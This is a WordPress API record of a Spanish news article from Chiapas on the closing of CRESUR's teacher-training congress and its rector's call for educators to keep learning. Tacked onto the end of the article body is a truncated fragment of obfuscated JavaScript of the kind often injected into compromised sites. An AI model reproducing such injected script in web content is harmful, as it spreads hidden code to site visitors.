{"id":4382,"date":"2022-08-13T02:56:18","date_gmt":"2022-08-13T02:56:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4382"},"modified":"2022-08-13T02:56:19","modified_gmt":"2022-08-13T02:56:19","slug":"destaca-cresur-papel-de-los-educadores","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4382","title":{"rendered":"Destaca CRESUR  papel de los educadores"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-12-at-4.56.40-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-4383\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-12-at-4.56.40-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-12-at-4.56.40-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-12-at-4.56.40-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-12-at-4.56.40-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-12-at-4.56.40-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El rector del Centro Regional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa (Cresur), Abraham Velasco Hern\u00e1ndez, consider\u00f3 que todos los trabajadores en sistema de educaci\u00f3n, est\u00e1n obligados a continuar aprendiendo, y prepar\u00e1ndose para ser mejores, esto durante la clausura del 2\u00ba Congreso Internacional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa. \u201cVayamos pensando de camino a casa, que en ning\u00fan momento, ninguna corresponsabilidad, en ning\u00fan puesto, en ning\u00fan rol que tengamos en la educaci\u00f3n es suficiente y se ha acabado nuestro proceso formativo, tambi\u00e9n los educadores estamos obligados a seguir aprendiendo, esa es la gran comisi\u00f3n que tenemos, que mientras promovemos aprendizajes y ense\u00f1anzas con nuestros roles educativos tambi\u00e9n nos instalemos en ciclos de mejora\u201d, dijo. Durante el acto protocolario de la clausura, indic\u00f3 que este evento, estuvo pensado para educadores, formadores o candidatos a ser docentes, donde se reflexion\u00f3 sobre los nuevos avatares que atraviesa la poblaci\u00f3n docente, con respecto al nuevo plan curricular, a los nuevos desaf\u00edos emergentes de la vida \u201cy la intenci\u00f3n fue intercambiar ideas  entre profesionales de la educaci\u00f3n en distintos rubros y \u00e1mbitos de competencias para contribuir al presente educativo\u201d. A los asistentes, puntualiz\u00f3 que parte de la mejora, se logra caminando y empap\u00e1ndose en los trabajos, sin embargo es importante que estando en la funci\u00f3n docente, se sigan preparando, \u201ctengo mucha fe en las nuevas generaciones, la pr\u00e1ctica docente es maravillosa, la educaci\u00f3n es maravillosa\u201d. Velasco Hern\u00e1ndez, destac\u00f3 que los pueblos y las sociedad, caminan a ritmo de que camina su educaci\u00f3n y es por eso importante fortalecer los procesos, que en este Congreso con ayuda de ponentes, talleristas nacionales y extranjeros, se les haya dado de manera did\u00e1ctica, metodolog\u00eda, fundamentos de la educaci\u00f3n, \u201cel cual se puede resumir en herramientas did\u00e1cticas metodol\u00f3gicas que el maestro y otros actores necesitan para su quehacer educativo\u201d. Finalmente revel\u00f3 que fueron cerca de 400 personas entre ponentes, asistentes, investigadores, talleristas, contando con una gran presencia de j\u00f3venes normalistas, quienes se hicieron presentes en este congreso que tuvo como sede, las instalaciones de la Universidad Intercultural de Chiapas (Unich).<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- El rector del Centro Regional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa (Cresur), Abraham Velasco Hern\u00e1ndez, consider\u00f3 que todos los trabajadores en sistema de educaci\u00f3n, est\u00e1n obligados a continuar aprendiendo, y prepar\u00e1ndose para ser mejores, esto durante la clausura del 2\u00ba Congreso Internacional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4383,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4382","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4382"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4382\/revisions"}],"predecessor-version":[{"id":4384,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4382\/revisions\/4384"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4383"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}